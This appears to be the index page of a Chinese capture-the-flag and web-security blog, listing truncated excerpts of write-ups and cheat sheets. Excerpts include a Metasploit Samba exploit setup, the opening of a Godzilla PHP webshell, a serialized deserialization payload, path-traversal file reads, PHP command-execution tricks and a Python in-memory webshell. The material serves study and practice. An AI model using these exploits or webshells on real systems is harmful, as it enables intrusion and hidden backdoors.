内网横向
metasploitSamba(139:445)1msf > search cve:2017-7494 12345msfconsoleuse exploit/linux/samba/is_known_pipenameset rhost 172.2.123.6set RPORT 445e...
bestphp's revenge
123456789101112 <?phphighlight_file(__FILE__);$b = 'implode';call_user_func($_GET['f'], $_POST);session_start();if (isset($_...
godzilla
12345678910111213141516171819<?php@error_reporting(0);session_start();$pass="pass";$key="3c6e0b8a9c15224a";function enc($dat...
DNS 便签
udp流中有查询记录,按前面的序号排好可以组成 1jbbvirt3mrxhgx3upb2f6y3iovxgw427nzswkzc7onxxe5d5 base32解码
tequila
反序列化很明显 superman->AT->mjh->mrcloud->wubin->__invoke 1?payload=O%3A8%3A%22superman%22%3A1%3A%7Bs%3A6%3A%22master%22%3BO%3A2%3A%22AT%2...
babyphp
123456789101112131415<div class="question"> <span>1169608</span> <span class="operator">+</spa...
ezphp
这题解法很多,两个类就行了,KSEC_CTF_2026用S解析绕过,exp: 1234567891011121314151617181920212223242526272829303132333435363738394041424344 <?phpclass GateKeeper...
Anaconda
直接登录 发现file_path传参 有文件读取漏洞 1http://8.154.22.32:20089/upload?file_path=../app.py 123456789101112131415161718192021222324252627282930313233343536...
php命令执行
系统命令执行函数exec,shell_exec,system,passthru,``,pcntl_exec,${} 1${phpinfo} assert(“system(‘ls’)”) 1assert("system(...
Flask
123456os.path.join()函数存在绝对路径拼接漏洞os.path.join(path,*paths)函数用于将多个文件路径连接成一个组合的路径。第一个函数通常包含了基础路径,而之后的每个参数被当作组件拼接到基础路径之后如果拼接的某个路径以 / 开头,那么包括基础路径在内的所有前缀...
php反序列化
通过恶意修改对象属性,造成漏洞利用或命令执行 php反序列化在请求头传序列化字符串可以url编码,不然有时候会被’;’分割成不完整 魔术方法123456789101112131415__construct:创建对象最先调用__destruct:对象被销毁调用__clone:使用clone复制对...
文件包含
php伪协议 file://文件路径:例, 1.win:file://C:/flag 2.file:///etc/passwd php://filter:例,php:/...
SQL
在 SQL 中,数字和字符串的比较是弱类型的,如果在比较操作中涉及到字符串和数字,SQL 会尝试将字符串转换为数字,那么只要字符串不是以数字开头,比较时都会转为数字 0 SQL队关键字完全不敏感,对数据库,表名,列名,在win系统下不敏感,在linux下绝大多数敏感 select嵌套可绕过列...
Python内存马
Python内存马老式内存马老版本内存马,现在使用会抛出一个异常了 1234567891011url_for.__globals__['__builtins__']['eval']( "app.add_url_rule( '/she...
